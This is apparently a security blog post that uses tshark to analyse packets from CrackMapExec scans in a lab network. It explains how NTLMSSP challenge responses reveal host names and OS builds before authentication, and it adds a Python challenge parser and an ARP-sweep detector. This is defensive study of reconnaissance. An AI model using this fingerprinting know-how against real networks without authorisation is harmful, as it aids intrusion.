Thursday, May 2, 2019

Having Fun with CrackMapExec - Packet Analysis with tshark

Let's now take a look at the packets which are generated when crackmapexec is executed on our network.

Here is the tcpdump filter which was configured to capture the traffic. The "-w" will change as I will have each crackmapexec command in its own pcap.

root@securitynik:~# tcpdump -nnvvi eth0 'not port (9997 or 8089 or 8191 or 8000 or 8065 or 68 or 67)' -w cme-scan.pcap

Now that we have the file named "cme-scan.pcap", let's perform our packet analysis on this.

As always, when running tshark (or wireshark) one of the first things we should do is look at the protocol statistics. We can achieve this as follows:

root@securitynik:~# tshark -n -r cme-scan.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:1570 bytes:72502
  arp                                    frames:1521 bytes:64188
  ip                                     frames:49 bytes:8314
    tcp                                  frames:48 bytes:8244
      nbss                               frames:28 bytes:6940
        smb                              frames:3 bytes:381
        smb2                             frames:25 bytes:6559
    icmp                                 frames:1 bytes:70
===================================================================

Let's look into the TCP traffic by first looking at the conversations.


root@securitynik:~# tshark -n -r cme-scan.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
                                                           |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                                           | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.0.0.100:34564           <-> 10.0.0.105:445                   9      1598      10      1166      19      2764    10.223046000        10.5146
10.0.0.100:39670           <-> 10.0.0.3:445                     6      1669       8      1030      14      2699     7.135418000         0.0369
10.0.0.100:50874           <-> 10.0.0.103:445                   6      1677       8      1030      14      2707     7.174715000         0.0219
10.0.0.100:50838           <-> 10.0.0.2:445                     0         0       1        74       1        74     7.135206000         0.0000
================================================================================

Interestingly, crackmapexec reported 3 hosts in its results, yet above we see 4 conversations on port 445. Let's set aside the bottom one: it totals only 74 bytes, one frame from 10.0.0.100 with nothing coming back (a SYN that was never answered), while the top 3 have over 1000 bytes each.

To make this a bit easier on ourselves, let's leverage a tshark filter that only focuses on the first conversation with source port 34564 and destination port 445.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(tcp.port == 34564) and (tcp.port == 445)"
  388  10.223046   10.0.0.100 → 10.0.0.105   TCP 74 34564 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2851720854 TSecr=0 WS=128
  391  10.223405   10.0.0.105 → 10.0.0.100   TCP 66 445 → 34564 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
  392  10.223423   10.0.0.100 → 10.0.0.105   TCP 54 34564 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
  395  10.224501   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
  399  10.225553   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  400  10.225566   10.0.0.100 → 10.0.0.105   TCP 54 34564 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
  420  10.231080   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
  421  10.231694   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  444  10.238197   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
  446  10.238929   10.0.0.105 → 10.0.0.100   SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
  447  10.243642   10.0.0.100 → 10.0.0.105   SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
  448  10.244629   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
  449  10.247201   10.0.0.100 → 10.0.0.105   SMB2 126 Session Logoff Request
  450  10.247610   10.0.0.105 → 10.0.0.100   SMB2 126 Session Logoff Response
  452  10.279539   10.0.0.105 → 10.0.0.100   TCP 126 [TCP Retransmission] 445 → 34564 [PSH, ACK] Seq=945 Ack=595 Win=2101760 Len=72
  453  10.279577   10.0.0.100 → 10.0.0.105   TCP 66 34564 → 445 [ACK] Seq=595 Ack=1017 Win=32512 Len=0 SLE=945 SRE=1017
 1565  20.735709   10.0.0.100 → 10.0.0.105   TCP 54 34564 → 445 [FIN, ACK] Seq=595 Ack=1017 Win=32512 Len=0
 1566  20.736058   10.0.0.105 → 10.0.0.100   TCP 60 445 → 34564 [ACK] Seq=1017 Ack=596 Win=2101760 Len=0
 1567  20.737597   10.0.0.105 → 10.0.0.100   TCP 60 445 → 34564 [RST, ACK] Seq=1017 Ack=596 Win=0 Len=0

With the above, we have an insight into what the communication looks like. We can see the TCP 3-way handshake complete, the SMB dialect negotiated and the session set up and logged off, and finally the TCP connection torn down: the client sends FIN, the server ACKs it and then closes its side with a RST.

Now if we look into the Session Setup Response that answers the NTLMSSP_NEGOTIATE (Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE), frame 446, we should be able to see how crackmapexec determined the operating system and so on. Let's take a look at specific fields in that "Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE" packet to bring some clarity to this. Let's also adjust our tshark filter to only look at traffic coming back from the 3 devices found (source port 445), while ignoring the ICMP frame. We will revisit the 1521 ARP frames which show up in the protocol hierarchy shortly, but work with me for now.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(tcp.srcport == 445) && !(icmp)"
   11   7.135744     10.0.0.3 → 10.0.0.100   TCP 66 445 → 39670 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
   14   7.137411     10.0.0.3 → 10.0.0.100   SMB2 506 Negotiate Protocol Response
   39   7.145265     10.0.0.3 → 10.0.0.100   SMB2 506 Negotiate Protocol Response
   63   7.154134     10.0.0.3 → 10.0.0.100   SMB2 401 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   87   7.163947     10.0.0.3 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_ACCESS_DENIED
  111   7.172290     10.0.0.3 → 10.0.0.100   TCP 60 445 → 39670 [RST, ACK] Seq=1328 Ack=579 Win=0 Len=0
  122   7.174930   10.0.0.103 → 10.0.0.100   TCP 66 445 → 50874 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
  125   7.182170   10.0.0.103 → 10.0.0.100   SMB2 506 Negotiate Protocol Response
  128   7.185537   10.0.0.103 → 10.0.0.100   SMB2 506 Negotiate Protocol Response
  130   7.189042   10.0.0.103 → 10.0.0.100   SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
  132   7.194414   10.0.0.103 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_ACCESS_DENIED
  134   7.196617   10.0.0.103 → 10.0.0.100   TCP 60 445 → 50874 [RST, ACK] Seq=1336 Ack=579 Win=0 Len=0
  391  10.223405   10.0.0.105 → 10.0.0.100   TCP 66 445 → 34564 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
  399  10.225553   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  421  10.231694   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  446  10.238929   10.0.0.105 → 10.0.0.100   SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
  448  10.244629   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
  450  10.247610   10.0.0.105 → 10.0.0.100   SMB2 126 Session Logoff Response
  452  10.279539   10.0.0.105 → 10.0.0.100   TCP 126 [TCP Retransmission] 445 → 34564 [PSH, ACK] Seq=945 Ack=595 Win=2101760 Len=72
 1566  20.736058   10.0.0.105 → 10.0.0.100   TCP 60 445 → 34564 [ACK] Seq=1017 Ack=596 Win=2101760 Len=0
 1567  20.737597   10.0.0.105 → 10.0.0.100   TCP 60 445 → 34564 [RST, ACK] Seq=1017 Ack=596 Win=0 Len=0

As we can see from above, we have a few response packets from the hosts at 10.0.0.3, 10.0.0.103 and 10.0.0.105. These match what crackmapexec found so far. Let's now look into the specific fields to show how it learned the information it displayed. Before looking at the specific fields, let's take frame 446 and expand it to see all of its fields.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(frame.number == 446)" -T text -V
Frame 446: 409 bytes on wire (3272 bits), 409 bytes captured (3272 bits)
    Encapsulation type: Ethernet (1)
    Arrival Time: Apr  7, 2019 23:12:40.690090000 EDT
    [Time shift for this packet: 0.000000000 seconds]
    Epoch Time: 1554693160.690090000 seconds
    [Time delta from previous captured frame: 0.000516000 seconds]
    [Time delta from previous displayed frame: 0.000000000 seconds]
    [Time since reference or first frame: 10.238929000 seconds]
    Frame Number: 446
    Frame Length: 409 bytes (3272 bits)
    Capture Length: 409 bytes (3272 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:ip:tcp:nbss:smb2:gss-api:spnego:ntlmssp]
Ethernet II, Src: 08:00:27:d1:1c:e7, Dst: 08:00:27:ac:14:9c
    Destination: 08:00:27:ac:14:9c
        Address: 08:00:27:ac:14:9c
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: 08:00:27:d1:1c:e7
        Address: 08:00:27:d1:1c:e7
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 10.0.0.105, Dst: 10.0.0.100
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
        0000 00.. = Differentiated Services Codepoint: Default (0)
        .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
    Total Length: 395
    Identification: 0x515e (20830)
    Flags: 0x4000, Don't fragment
        0... .... .... .... = Reserved bit: Not set
        .1.. .... .... .... = Don't fragment: Set
        ..0. .... .... .... = More fragments: Not set
        ...0 0000 0000 0000 = Fragment offset: 0
    Time to live: 128
    Protocol: TCP (6)
    Header checksum: 0x9342 [validation disabled]
    [Header checksum status: Unverified]
    Source: 10.0.0.105
    Destination: 10.0.0.100
Transmission Control Protocol, Src Port: 445, Dst Port: 34564, Seq: 505, Ack: 342, Len: 355
    Source Port: 445
    Destination Port: 34564
    [Stream index: 3]
    [TCP Segment Len: 355]
    Sequence number: 505    (relative sequence number)
    [Next sequence number: 860    (relative sequence number)]
    Acknowledgment number: 342    (relative ack number)
    0101 .... = Header Length: 20 bytes (5)
    Flags: 0x018 (PSH, ACK)
        000. .... .... = Reserved: Not set
        ...0 .... .... = Nonce: Not set
        .... 0... .... = Congestion Window Reduced (CWR): Not set
        .... .0.. .... = ECN-Echo: Not set
        .... ..0. .... = Urgent: Not set
        .... ...1 .... = Acknowledgment: Set
        .... .... 1... = Push: Set
        .... .... .0.. = Reset: Not set
        .... .... ..0. = Syn: Not set
        .... .... ...0 = Fin: Not set
        [TCP Flags: ·······AP···]
    Window size value: 8211
    [Calculated window size: 2102016]
    [Window size scaling factor: 256]
    Checksum: 0x10ec [unverified]
    [Checksum Status: Unverified]
    Urgent pointer: 0
    [SEQ/ACK analysis]
        [This is an ACK to the segment in frame: 444]
        [The RTT to ACK the segment was: 0.000732000 seconds]
        [iRTT: 0.000377000 seconds]
        [Bytes in flight: 355]
        [Bytes sent since last PSH flag: 355]
    [Timestamps]
        [Time since first frame in this TCP stream: 0.015883000 seconds]
        [Time since previous frame in this TCP stream: 0.000732000 seconds]
    TCP payload (355 bytes)
NetBIOS Session Service
    Message Type: Session message (0x00)
    Length: 351
SMB2 (Server Message Block Protocol version 2)
    SMB2 Header
        Server Component: SMB2
        Header Length: 64
        Credit Charge: 1
        NT Status: STATUS_MORE_PROCESSING_REQUIRED (0xc0000016)
        Command: Session Setup (1)
        Credits granted: 1
        Flags: 0x00000001, Response
            .... .... .... .... .... .... .... ...1 = Response: This is a RESPONSE
            .... .... .... .... .... .... .... ..0. = Async command: This is a SYNC command
            .... .... .... .... .... .... .... .0.. = Chained: This pdu is NOT a chained command
            .... .... .... .... .... .... .... 0... = Signing: This pdu is NOT signed
            .... .... .... .... .... .... .000 .... = Priority: This pdu does NOT contain a PRIORITY1
            ...0 .... .... .... .... .... .... .... = DFS operation: This is a normal operation
            ..0. .... .... .... .... .... .... .... = Replay operation: This is NOT a replay operation
        Chain Offset: 0x00000000
        Message ID: Unknown (2)
        Process Id: 0x00000000
        Tree Id: 0x00000000
        Session Id: 0x000048000000003d
        Signature: 00000000000000000000000000000000
        [Response to: 444]
        [Time from request: 0.000732000 seconds]
    Session Setup Response (0x01)
        StructureSize: 0x0009
            0000 0000 0000 100. = Fixed Part Length: 4
            .... .... .... ...1 = Dynamic Part: True
        Session Flags: 0x0000
            .... .... .... ...0 = Guest: False
            .... .... .... ..0. = Null: False
            .... .... .... .0.. = Encrypt: False
        Blob Offset: 0x00000048
        Blob Length: 279
        Security Blob: a18201133082010fa0030a0101a10c060a2b060104018237...
            GSS-API Generic Security Service Application Program Interface
                Simple Protected Negotiation
                    negTokenTarg
                        negResult: accept-incomplete (1)
                        supportedMech: 1.3.6.1.4.1.311.2.2.10 (NTLMSSP - Microsoft NTLM Security Support Provider)
                        responseToken: 4e544c4d53535000020000001600160038000000358289e2...
                        NTLM Secure Service Provider
                            NTLMSSP identifier: NTLMSSP
                            NTLM Message Type: NTLMSSP_CHALLENGE (0x00000002)
                            Target Name: SECURITYNIK
                                Length: 22
                                Maxlen: 22
                                Offset: 56
                            Negotiate Flags: 0xe2898235, Negotiate 56, Negotiate Key Exchange, Negotiate 128, Negotiate Version, Negotiate Target Info, Negotiate Extended Security, Target Type Domain, Negotiate Always Sign, Negotiate NTLM key, Negotiate Seal, Negotia
                                1... .... .... .... .... .... .... .... = Negotiate 56: Set
                                .1.. .... .... .... .... .... .... .... = Negotiate Key Exchange: Set
                                ..1. .... .... .... .... .... .... .... = Negotiate 128: Set
                                ...0 .... .... .... .... .... .... .... = Negotiate 0x10000000: Not set
                                .... 0... .... .... .... .... .... .... = Negotiate 0x08000000: Not set
                                .... .0.. .... .... .... .... .... .... = Negotiate 0x04000000: Not set
                                .... ..1. .... .... .... .... .... .... = Negotiate Version: Set
                                .... ...0 .... .... .... .... .... .... = Negotiate 0x01000000: Not set
                                .... .... 1... .... .... .... .... .... = Negotiate Target Info: Set
                                .... .... .0.. .... .... .... .... .... = Request Non-NT Session: Not set
                                .... .... ..0. .... .... .... .... .... = Negotiate 0x00200000: Not set
                                .... .... ...0 .... .... .... .... .... = Negotiate Identify: Not set
                                .... .... .... 1... .... .... .... .... = Negotiate Extended Security: Set
                                .... .... .... .0.. .... .... .... .... = Target Type Share: Not set
                                .... .... .... ..0. .... .... .... .... = Target Type Server: Not set
                                .... .... .... ...1 .... .... .... .... = Target Type Domain: Set
                                .... .... .... .... 1... .... .... .... = Negotiate Always Sign: Set
                                .... .... .... .... .0.. .... .... .... = Negotiate 0x00004000: Not set
                                .... .... .... .... ..0. .... .... .... = Negotiate OEM Workstation Supplied: Not set
                                .... .... .... .... ...0 .... .... .... = Negotiate OEM Domain Supplied: Not set
                                .... .... .... .... .... 0... .... .... = Negotiate Anonymous: Not set
                                .... .... .... .... .... .0.. .... .... = Negotiate NT Only: Not set
                                .... .... .... .... .... ..1. .... .... = Negotiate NTLM key: Set
                                .... .... .... .... .... ...0 .... .... = Negotiate 0x00000100: Not set
                                .... .... .... .... .... .... 0... .... = Negotiate Lan Manager Key: Not set
                                .... .... .... .... .... .... .0.. .... = Negotiate Datagram: Not set
                                .... .... .... .... .... .... ..1. .... = Negotiate Seal: Set
                                .... .... .... .... .... .... ...1 .... = Negotiate Sign: Set
                                .... .... .... .... .... .... .... 0... = Request 0x00000008: Not set
                                .... .... .... .... .... .... .... .1.. = Request Target: Set
                                .... .... .... .... .... .... .... ..0. = Negotiate OEM: Not set
                                .... .... .... .... .... .... .... ...1 = Negotiate UNICODE: Set
                            NTLM Server Challenge: 67f26f829961c6cf
                            Reserved: 0000000000000000
                            Target Info
                                Length: 168
                                Maxlen: 168
                                Offset: 78
                                Attribute: NetBIOS domain name: SECURITYNIK
                                    Target Info Item Type: NetBIOS domain name (0x0002)
                                    Target Info Item Length: 22
                                    NetBIOS Domain Name: SECURITYNIK
                                Attribute: NetBIOS computer name: SECNIK-2K19
                                    Target Info Item Type: NetBIOS computer name (0x0001)
                                    Target Info Item Length: 22
                                    NetBIOS Computer Name: SECNIK-2K19
                                Attribute: DNS domain name: securitynik.local
                                    Target Info Item Type: DNS domain name (0x0004)
                                    Target Info Item Length: 34
                                    DNS Domain Name: securitynik.local
                                Attribute: DNS computer name: SECNIK-2K19.securitynik.local
                                    Target Info Item Type: DNS computer name (0x0003)
                                    Target Info Item Length: 58
                                    DNS Computer Name: SECNIK-2K19.securitynik.local
                                Attribute: Timestamp
                                    Target Info Item Type: Timestamp (0x0007)
                                    Target Info Item Length: 8
                                    Timestamp: Apr  7, 2019 23:12:40.658449900 EDT
                                Attribute: End of list
                                    Target Info Item Type: End of list (0x0000)
                                    Target Info Item Length: 0
                            Version 10.0 (Build 17763); NTLM Current Revision 15
                                Major Version: 10
                                Minor Version: 0
                                Build Number: 17763
                                NTLM Current Revision: 15

From above, we literally broke out all the fields for this packet. As you can see, a lot of the information which crackmapexec displayed is already visible here: the NetBIOS and DNS computer and domain names come from the Target Info attributes of the NTLMSSP_CHALLENGE, and the operating system (10.0, build 17763) comes from its Version field. Let's now prepare to wrap this part up by extracting those fields and presenting them in a more user-friendly manner.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(ntlmssp.messagetype == 0x00000002)" -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e ntlmssp.identifier -e ntlmssp.challenge.target_name -e ntlmssp.challenge.target_info.nb_domain_name -e ntlmssp.version.major -e ntlmssp.version.build_number -E header=y
ip.src tcp.srcport ip.dst tcp.dstport ntlmssp.identifier ntlmssp.challenge.target_name ntlmssp.challenge.target_info.nb_domain_name ntlmssp.version.major ntlmssp.version.build_number
10.0.0.3 445 10.0.0.100 39670 NTLMSSP SECURITYNIK-SYS SECURITYNIK-SYS 10 17763
10.0.0.103 445 10.0.0.100 50874 NTLMSSP SECURITYNIK-WIN SECURITYNIK-WIN 10 16299
10.0.0.105 445 10.0.0.100 34564 NTLMSSP SECURITYNIK SECURITYNIK 10 17763

Obviously, you should now try to extract some of the other fields that I did not include.
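The tshark field extraction above pulls a handful of values out of the NTLMSSP_CHALLENGE. To show where those values actually live in the bytes, here is an added example (my own code, not from the original post or from crackmapexec) that decodes a CHALLENGE_MESSAGE the way a dissector does: every variable-length field is found through its Len/MaxLen/Offset triple, the Target Info list is walked AV_PAIR by AV_PAIR, and the Version structure is read when the Negotiate Version flag is set. The sample message is constructed here from the values Wireshark showed for frame 446 (the 0xe2898235 flags, the 67f26f829961c6cf challenge, the SECURITYNIK names and build 17763); the 168-byte Target Info and offsets 56 and 78 fall out of the same layout the dissector reported. The one-line banner format in `os_summary` is my own approximation, not crackmapexec's output.

```python
import struct
from datetime import datetime, timedelta, timezone

# Constants from MS-NLMP (only the ones this parser needs)
NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
MSG_CHALLENGE = 2
NEGOTIATE_UNICODE = 0x00000001
NEGOTIATE_TARGET_INFO = 0x00800000
NEGOTIATE_VERSION = 0x02000000
# AV_PAIR AvId values (MS-NLMP 2.2.2.1); 0 is MsvAvEOL
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
            9: "TargetName"}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_challenge(msg: bytes) -> dict:
    """Decode a CHALLENGE_MESSAGE (Type 2) using the Len/MaxLen/Offset triples."""
    if msg[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    msg_type, = struct.unpack_from("<I", msg, 8)
    if msg_type != MSG_CHALLENGE:
        raise ValueError(f"expected NTLMSSP_CHALLENGE, got type {msg_type}")
    tn_len, _tn_max, tn_off = struct.unpack_from("<HHI", msg, 12)
    flags, = struct.unpack_from("<I", msg, 20)
    server_challenge = msg[24:32]            # 8 random bytes; Reserved follows at 32..40
    ti_len, _ti_max, ti_off = struct.unpack_from("<HHI", msg, 40)
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "ascii"
    out = {"target_name": msg[tn_off:tn_off + tn_len].decode(enc),
           "flags": flags, "server_challenge": server_challenge.hex(),
           "version": None, "target_info": {}}
    if flags & NEGOTIATE_VERSION:            # 8-byte VERSION structure at 48..56
        major, minor, build, rev = struct.unpack_from("<BBH3xB", msg, 48)
        out["version"] = (major, minor, build, rev)
    if flags & NEGOTIATE_TARGET_INFO:
        pos, end = ti_off, ti_off + ti_len
        while pos + 4 <= end:
            av_id, av_len = struct.unpack_from("<HH", msg, pos)
            pos += 4
            value = msg[pos:pos + av_len]
            pos += av_len
            if av_id == 0:                   # MsvAvEOL terminates the list
                break
            name = AV_NAMES.get(av_id, f"AvId{av_id}")
            if av_id in (1, 2, 3, 4, 5, 9):  # names are always UTF-16LE
                out["target_info"][name] = value.decode("utf-16-le")
            elif av_id == 7:                 # FILETIME: 100 ns ticks since 1601-01-01
                ft = struct.unpack("<Q", value)[0]
                out["target_info"][name] = FILETIME_EPOCH + timedelta(microseconds=ft // 10)
            elif av_id == 6:
                out["target_info"][name] = struct.unpack("<I", value)[0]
            else:
                out["target_info"][name] = value.hex()
    return out


def build_challenge(target_name, av_pairs, flags, server_challenge, version):
    """Assemble a CHALLENGE_MESSAGE from its parts; used only to make a
    self-contained sample here. av_pairs is a list of (AvId, raw bytes)."""
    name = target_name.encode("utf-16-le")
    info = b"".join(struct.pack("<HH", i, len(v)) + v for i, v in av_pairs)
    info += struct.pack("<HH", 0, 0)                                  # MsvAvEOL
    major, minor, build, rev = version
    hdr = NTLMSSP_SIGNATURE + struct.pack("<I", MSG_CHALLENGE)
    hdr += struct.pack("<HHI", len(name), len(name), 56)              # TargetNameFields
    hdr += struct.pack("<I", flags)
    hdr += server_challenge + bytes(8)                                # ServerChallenge, Reserved
    hdr += struct.pack("<HHI", len(info), len(info), 56 + len(name))  # TargetInfoFields
    hdr += struct.pack("<BBH3xB", major, minor, build, rev)           # VERSION
    assert len(hdr) == 56
    return hdr + name + info


def sample_challenge() -> bytes:
    """Constructed sample reproducing the values Wireshark showed for frame 446."""
    u16 = lambda s: s.encode("utf-16-le")
    stamp = datetime(2019, 4, 8, 3, 12, 40, tzinfo=timezone.utc)   # 23:12:40 EDT
    filetime = (stamp - FILETIME_EPOCH) // timedelta(microseconds=1) * 10
    av_pairs = [(2, u16("SECURITYNIK")), (1, u16("SECNIK-2K19")),
                (4, u16("securitynik.local")), (3, u16("SECNIK-2K19.securitynik.local")),
                (7, struct.pack("<Q", filetime))]
    return build_challenge("SECURITYNIK", av_pairs, 0xE2898235,
                           bytes.fromhex("67f26f829961c6cf"), (10, 0, 17763, 15))


def os_summary(info: dict) -> str:
    """One-line host fingerprint in the spirit of the crackmapexec banner (my own format)."""
    ti = info["target_info"]
    major, minor, build, _ = info["version"]
    return (f"Windows {major}.{minor} Build {build} "
            f"(name:{ti.get('NbComputerName')}) (domain:{ti.get('NbDomainName')})")


if __name__ == "__main__":
    parsed = parse_challenge(sample_challenge())
    print(os_summary(parsed))
    for key, val in parsed["target_info"].items():
        print(f"  {key}: {val}")
```

Everything in the banner is handed over by the server before any credential is checked, which is why an unauthenticated session setup is enough to fingerprint the host, and why the Target Info names and Version are worth logging from the defender's side too: a single NTLMSSP_CHALLENGE per host, across many hosts, from one client in a short window is the network signature of exactly this kind of enumeration.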

Before we go, remember that when we looked at the protocol hierarchy above there were 1521 ARP frames. Let's see what we can gather from these.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(arp)" | wc --lines
1521

From above, it looks like we have 1521 ARP messages. Let's see what is really going on here. To help us understand, let's once again look into the fields and parse out the information of interest.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(arp)" -T fields -e arp.src.hw_mac  -e arp.src.proto_ipv4 -e arp.dst.proto_ipv4 -e arp.opcode -E header=y | more
arp.src.hw_mac  arp.src.proto_ipv4 arp.dst.proto_ipv4 arp.opcode
08:00:27:ec:69:d7 10.0.0.103  10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103  10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103  10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103  10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103  10.0.0.102 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.1 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.4 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.5 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.6 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.7 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.8 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.9 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.10 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.49 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.50 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.51 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.52 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.53 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.54 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.55 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.56 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.57 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.58 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.59 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.11 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.12 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.13 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.14 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.15 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.16 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.17 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.18 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.21 1

.... <truncated for brevity> ....
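The field dump above shows 10.0.0.100 (08:00:27:ac:14:9c) sending ARP requests for one address after another, which is how the scanning host discovers who is alive on the local segment before it ever talks SMB. As an added example (my own code, not from the post), here is a small detector that reads the tab-separated `-T fields -E header=y` output shown above and flags any source that requests more than a threshold of distinct IPs, together with how many of those requests were answered; a sweep across a mostly empty range is loud in requests and nearly silent in replies. The capture is constructed inline in the same layout, with the 10.0.0.1-60 sweep generated rather than pasted; the threshold of 16 is an assumption to tune per network.

```python
from collections import defaultdict


def constructed_arp_fields() -> str:
    """Constructed sample in the layout of tshark's -T fields -E header=y output."""
    rows = ["arp.src.hw_mac\tarp.src.proto_ipv4\tarp.dst.proto_ipv4\tarp.opcode"]
    # Ordinary traffic: one host repeatedly asking for a single neighbour, which answers.
    rows += ["08:00:27:ec:69:d7\t10.0.0.103\t10.0.0.102\t1"] * 5
    rows += ["08:00:27:11:22:33\t10.0.0.102\t10.0.0.103\t2"]
    # Sweep: 10.0.0.100 asks "who has" for every address in 10.0.0.1-60.
    rows += [f"08:00:27:ac:14:9c\t10.0.0.100\t10.0.0.{i}\t1" for i in range(1, 61)]
    # Only one of the swept addresses replies.
    rows += ["08:00:27:44:55:66\t10.0.0.3\t10.0.0.100\t2"]
    return "\n".join(rows) + "\n"


def parse_arp_fields(text: str):
    """Turn the tab-separated field dump into one dict per frame keyed by field name."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header = lines[0].split("\t")
    return [dict(zip(header, ln.split("\t"))) for ln in lines[1:]]


def find_arp_sweeps(records, min_targets: int = 16):
    """Return {src_mac: summary} for every source that ARP-requested at least
    min_targets distinct IPs (opcode 1), with a count of how many answered (opcode 2)."""
    asked = defaultdict(set)        # requester MAC -> distinct IPs it asked for
    src_ip = {}                     # requester MAC -> its own IP
    replies_to = defaultdict(set)   # target IP of a reply -> IPs that replied to it
    for r in records:
        if r["arp.opcode"] == "1":
            asked[r["arp.src.hw_mac"]].add(r["arp.dst.proto_ipv4"])
            src_ip[r["arp.src.hw_mac"]] = r["arp.src.proto_ipv4"]
        elif r["arp.opcode"] == "2":
            replies_to[r["arp.dst.proto_ipv4"]].add(r["arp.src.proto_ipv4"])
    sweeps = {}
    for mac, targets in asked.items():
        if len(targets) >= min_targets:
            answered = targets & replies_to[src_ip[mac]]
            sweeps[mac] = {"src_ip": src_ip[mac],
                           "distinct_targets": len(targets),
                           "answered": len(answered)}
    return sweeps


if __name__ == "__main__":
    for mac, s in find_arp_sweeps(parse_arp_fields(constructed_arp_fields())).items():
        print(f"{mac} ({s['src_ip']}): asked for {s['distinct_targets']} IPs, "
              f"{s['answered']} answered")
```

To run it against a real capture, feed it the output of the tshark command above (without the `| more`); the field names in the header line are what the parser keys on, so add `-e frame.time_relative` if you also want to bound the sweep to a time window.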

Let's now look at what the packets look like as CrackMapExec enumerates the shares.

Let's once again start with looking at the protocol hierarchy

root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:487 bytes:131203
